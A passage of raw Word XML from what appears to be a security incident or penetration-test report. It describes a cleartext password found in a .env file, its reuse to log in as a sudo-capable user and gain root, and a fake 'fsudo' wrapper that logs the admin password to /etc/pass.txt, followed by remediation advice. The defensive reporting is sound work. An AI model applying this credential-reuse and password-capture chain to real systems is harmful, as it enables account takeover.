      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>eL_</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>XXX</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MaS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> was found to be used by accessing the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dotenv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> file inside the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mqtt_server</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/subscriber</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEE9B67" w14:textId="64ACAEAB" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="00B43491" w:rsidP="00746901">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A77E503" wp14:editId="5722E419">
            <wp:extent cx="4634317" cy="1406321"/>
            <wp:effectExtent l="19050" t="19050" r="13970" b="2286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2892" cy="1411958"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent2"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="260B480E" w14:textId="03F4F496" w:rsidR="00B43491" w:rsidRPr="002355AE" w:rsidRDefault="00B43491" w:rsidP="00B43491">
      <w:pPr>
        <w:pStyle w:val="Beschriftung"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00F724D7">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Disclosed password found in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mqtt_servers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/subscriber</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/.env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="623BAA90" w14:textId="0B71BF30" w:rsidR="00B43491" w:rsidRPr="002355AE" w:rsidRDefault="00B43491" w:rsidP="00B43491">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">When trying to use the same password as a login password for other users found on the system, the login for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00746901" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00746901" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> succeeded. As this user is part of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00746901" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00746901" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> group, access from this user to root was trial, as only </w:t>
      </w:r>
      <w:r w:rsidR="00746901" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00746901" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00746901" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00746901" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>su</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00746901" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00746901" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00746901" w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> had to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCC9EB4" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="008809DD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Remediation</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10080"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72"/>
        <w:gridCol w:w="8208"/>
      </w:tblGrid>
      <w:tr w:rsidR="008809DD" w:rsidRPr="002355AE" w14:paraId="3C6F2038" w14:textId="77777777" w:rsidTr="0035074C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="57F1229A" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Who:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58C94529" w14:textId="570BD664" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="00746901" w:rsidP="00875E28">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Sysadmin and owner of user account </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>johnsysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008809DD" w:rsidRPr="002355AE" w14:paraId="5524CBEA" w14:textId="77777777" w:rsidTr="0035074C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F7CAAC" w:themeFill="accent2" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4E0DE05C" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="00875E28">
            <w:pPr>
              <w:pStyle w:val="FindingTableLabel"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>Action:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8208" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C0403D5" w14:textId="70AF118A" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="00746901" w:rsidP="00746901">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The usage of a password manager for storing passwords is recommended, to mitigate the risk of password reusage. Additionally, passwords that are used for administrator accounts should never be used for services running on the server when the password is stored in clear text. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="30B7611D" w14:textId="77777777" w:rsidR="00746901" w:rsidRPr="002355AE" w:rsidRDefault="00746901" w:rsidP="00746901">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">To remediate the current situation all user and service passwords must be changed immediately. This is important as the attacker has access to the current used passwords of the user </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>johnsysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CCB7A6E" w14:textId="3B60667A" w:rsidR="00746901" w:rsidRPr="002355AE" w:rsidRDefault="00746901" w:rsidP="00746901">
            <w:pPr>
              <w:keepNext/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Additionally the file </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>johnsysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/.locale</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>fsudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> must be removed from the system, as this programs writes the admin password of </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>johnsysadmin</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> to a file, every time it is used. More information on this application can be found in the following chapter </w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> REF _Ref119788338 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> \* MERGEFORMAT </w:instrText>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00F724D7" w:rsidRPr="00F724D7">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Modified </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00F724D7" w:rsidRPr="00F724D7">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>fsudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00F724D7" w:rsidRPr="00F724D7">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> binary</w:t>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="002355AE">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7FAFB6E1" w14:textId="77777777" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="008809DD">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22420EB2" w14:textId="1307E501" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="008809DD" w:rsidP="00C73D00">
      <w:pPr>
        <w:pStyle w:val="berschrift1"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F7F35F8" w14:textId="0741E7D8" w:rsidR="008809DD" w:rsidRPr="002355AE" w:rsidRDefault="00E50B77" w:rsidP="000F6F1C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Franklin Gothic Book" w:eastAsia="Calibri" w:hAnsi="Franklin Gothic Book" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DEF365" w14:textId="0667EB31" w:rsidR="00C73D00" w:rsidRPr="002355AE" w:rsidRDefault="00194A65" w:rsidP="006234C2">
      <w:pPr>
        <w:pStyle w:val="berschrift2"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc119432378"/>
      <w:bookmarkStart w:id="20" w:name="_Toc119794115"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Possible </w:t>
      </w:r>
      <w:r w:rsidR="00C73D00" w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Exploitation Paths</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="65BED375" w14:textId="48643A66" w:rsidR="006234C2" w:rsidRPr="002355AE" w:rsidRDefault="004375EB" w:rsidP="0035074C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">After a successful exploitation of the terminal application the attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>is able to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> access the</w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> home directory </w:t>
      </w:r>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. The author assumes that because of this access to the host system, the attacker was able to write a fake </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fsudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> script to </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the .locale</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> folder of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>johnsysadmin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48213232" w14:textId="2971D1A0" w:rsidR="004375EB" w:rsidRPr="002355AE" w:rsidRDefault="004375EB" w:rsidP="0035074C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After john used his password to get root access, his password was probably cached to the /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="002355AE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">/pass.txt file, which can be used by the attacker. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D84811C" w14:textId="6F5F59A4" w:rsidR="004375EB" w:rsidRPr="002355AE" w:rsidRDefault="004375EB" w:rsidP="0035074C">
      <w:pPr>
        <w:rPr>
